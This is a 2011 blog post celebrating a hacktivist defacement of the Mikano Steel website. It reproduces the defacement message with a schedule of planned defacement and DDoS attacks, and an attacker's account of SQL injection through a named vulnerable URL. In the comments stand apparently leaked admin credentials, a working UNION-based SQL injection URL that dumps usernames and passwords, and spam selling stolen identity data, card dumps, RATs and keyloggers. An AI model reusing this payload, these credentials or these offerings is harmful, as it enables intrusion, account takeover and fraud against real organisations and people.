HackerLeaks Disclosures: Mikano Steel Web Site Hacked !

By Commander X

5:45 PM PT June 24, 2011

HackerLeaks has just been notified by an anonymous source that the Mikano Steel web site has been badly hacked. The site is located at -

http://www.mikanosteel.com/

The site was massively defaced, as the screen shots will show. HackerLeaks staff have verified that 30 minutes after the leak was received the site is still in the state shown in these photos. The defacement and attack are part of Operation Let There Be Light In Nigeria, a joint Op of Naija Cyber Hactivists, the Peoples Liberation Front - and Anonymous. According to our source, members of all three groups participated. Operation Let There Be Light In Nigeria according to the source of this disclosure is an Operation to bring badly needed affordable electrical energy to the Nigerian people. The site was also defaced with the following message:

" Hacked By The Naija Cyber Hactivists
This site was hacked using a tiger 1 kva generator with 5 littres of fuel ! no be so he suppose be :-(
#LetThereBeLightInNigeria
    NaijaCyberHactivists have officially Decided to identify with the Nigerian Million March project facebook.com/event.php?eid=219476691418888 (Let there be light in Nigeria). The official #Hashtag would be #LetThereBeLightInNigeria
       Our aim is to identify both from the Cyber Space and the Fields with,collaboration with The PLF and Anonymous
        We are standing against Darkness !
        We are saying enough is enough !
        We are saying Let there be light in Nigeria !
        Young and Old ,
        Liberal , Progressives and Conservatives
        North, South,East and West
       Christians and Muslims.
        We can not sit at our systems, browsing facebook, tweeting while expecting a revolution.
        Every time we decide not to exercise our rights, We contribute to the oppresion of the human body
        and the repression of the human mind.
        You have a choice to make,... walk willingly in into your own submission
        Or
        A choice to get up, walk the walk and say enough is enough -No more darkness in Nigeria!
        There is going to be a peaceful action named Nigerian Million March.
        The Nigerian Million March, is a PEACEFUL march with NO POLITICAL AGENDA and is NOT POLITICALLY AFFILIATED and not started by NaijaCyberHactivists.

        What is the purpose of the peaceful “Nigerian Million March”?
        To create a greater awareness that the lack of electricity denies Nigerians of their basic necessities of life such as: Employment, Security, Good Health, Education, Economic Growth and many more.

        For more info : http://www.facebook.com/event.php?eid=219476691418888
                        http://www.nigerianmillionmarch.com/

        This is a noble cause for our nation and we have decided to identify with this project.
        You will hear more from us -STAY TUNED!

       Naijacyberhactivists - In Source Code We Trust, Fighting for a cause.
       Our Mission : Hand Over The Whip To The Horse!

    http://twitter.com/#!/NaijaCyberHack
Naijacyberhactivists@yahoo.com

    We would be using defacement and ddos as a media to make the #LightUpNigeria movement known to the public
    The main targets would be http://www.phcnonline.com/ and http://www.mikano-intl.com/

    The Op #LetThereBeLightInNigeria would be going live on 24th June 2011 and subsequent attacks will follow suit
    as stated below :

    #LetThereBeLightInNigeria Attack 1 - June 24th
    #LetThereBeLightInNigeria Attack 2 - July 24th
    #LetThereBeLightInNigeria Attack 3 - August 24th
    #LetThereBeLightInNigeria Attack 4 - September 24th"

According to one of the sources of this leak, the hackers used the follwing technique to gain entry into the site: "okay i just used a sqli simple injection
used havij to dump it
then asked flip0ut to help me with the admin page
he got it and i entered it
when i got in there was a cms editor i was familiar with
so i just started working on it
i first i use havij to dunp this url http://www.mikanosteel.com/product-image. php?picid=6'"

The source for this disclosure also indicated that the database from this site was also stolen and is being forwarded to HackerLeaks. This is a breaking release and we will update this post as more info is sent to us.

4 comments:

AnonymousJuly 3, 2011 at 4:15 PM
Admin: 1995m@kano
Password: m@kano2011
c0pperJuly 6, 2011 at 5:38 AM
To all the sKiddies: Please learn how to inject manually! Havij rocks, but you should also rock! ;)

However, here's my POC for this Page, a more or less (more less than more) nice Formatting for the Password...

@mikanosteel.com: you should be able to get that fixed soon, because another defacing would just be bad for PR...

Here is the POC:

http://www.mikanosteel.com/bigimage.php?prodid=0'UNION ALL SELECT 1,2,3,concat(0x223e3c2f74643e3c2f74723e3c2f7461626c653e3c2f6469763e3c646976207374796c653d22706f736974696f6e3a2066697865643b20746f703a203070783b206c6566743a3070783b2077696474683a2036303070783b206865696768743a31303070783b206261636b67726f756e642d636f6c6f723a20726762283235352c302c3029223e557365723a2020203c623e,username,0x3c2f623e3c62723e50617373776f72643a202020,password,0x3c62723e3c62723e3c62723e50726f6f66204f6620436f6e63657074206279203c623e6330707065723c2f623e3c2f6469763e3c696d67),4,5,6 FROM users WHERE '1'='1

Best Regards from a white hat
c0pper

PS: Sorry for the unreadable HeX code, Blogspot doesn't allow < tD> codes... (stupid, isn't it? :P)
Cool StuffJune 20, 2022 at 8:57 AM
++{Hi Everyone}++

We are providing all type of FULLZ. Freshly spammed & verified FULLZ with good quality.
*Bulk quantity also available*

-->Details Available In Fullz<--
o>SSN+don+address & SSN+dob+DL+Address
o>Employee & Bank Account Details will be given on demand
o>High CS Fullz with complete info
o>Fullz for SBA, PUA, E-filling & Return Filling

**PING ME ON**
-->ICQ >> 752822040 -->Telegram >> @leadsupplier -->Skype >> Peeterhacks

TOOLS & TUTORIALS AVAILABLE
-->All Types of Tools & Tutorials also available for Learning Ethical Hacking, Carding & Spamming<--
Working & genuine tools with good validity you can get on few taps.

o>Ethical Hacking Ebooks, Tools & Tutorials
o>Penetration Testing
o>Trojan using PHP
o>Bitcoin Cracker
o>Kali Linux
o>DUMPS with pins track 1 and 2 with & without pin
o>RAT's
o>Keylogger & Keystroke Logger
o>Whatsapp Cracked Version
o>Robotics
o>BTC Flasher
o>SQL Injector
o>BTC Cracker
o>SMTP Linux Root
o>Shell Scripting
o>SMTP's, Safe Socks, Rdp's brute
o>PHP mailer
o>SMS Sender & Email Blaster
o>Cpanel
o>Server I.P's & Proxies
o>Viruses & VPN's
o>HQ Email Combo's

+All tools are genuine & valid.
+Feel free to asked for any tool & tutorial.

**HIT ME UP ON**
-->ICQ >> 752822040 -->Telegram >> @killhacks -->Skype >> Peeterhacks
Big BullOctober 25, 2022 at 9:20 PM
Hacking/Spamming/Carding/FULLZ Stuff

Hit me up
752822040 I-C-Q
@killhacks Tel-Gram
peeterhacks Skype/Wickr

All Stuff Will Be Legit & Verified
Tools & CC's Testing Won't Be Provided

Hacking Tools & Tutorials with complete guide
Spamming Stuff with Legit Tools & Leads with tutorials
Carding Methods & Cashout process with complete details
Key Loggers
Smtp's/Rdp's/Shells/C-panels
BTC Cracker/Flasher
FB/WA Hacking Tips & Tricks
Kali Linux Master Class Complete Updated Version
Combos
----------------------------------------
----------------------------------------

SSN DOB FULLZ
SSN DOB DL FULLZ
HIGH CS FULLZ 700+
PREMIUM FULLZ
CC FULLZ WITH CVV
DUMPS WITH PIN CODES (TRACK 101-202)

Fresh Spammed & Valid Info
Invalid Info will be replace/No refund

Ping me :-
Tele-Gram > @leadsupplier
I C Q > 7528-2204-0
Wickr/Skype > peeterhacks
-----------------------------------------
-----------------------------------------

Discounts for bulk order
Payment mode crypto currency (BTC ETH USDT etc)
Sampling are just for bulk orders

THANKYOU

Friday, June 24, 2011

Mikano Steel Web Site Hacked !

4 comments: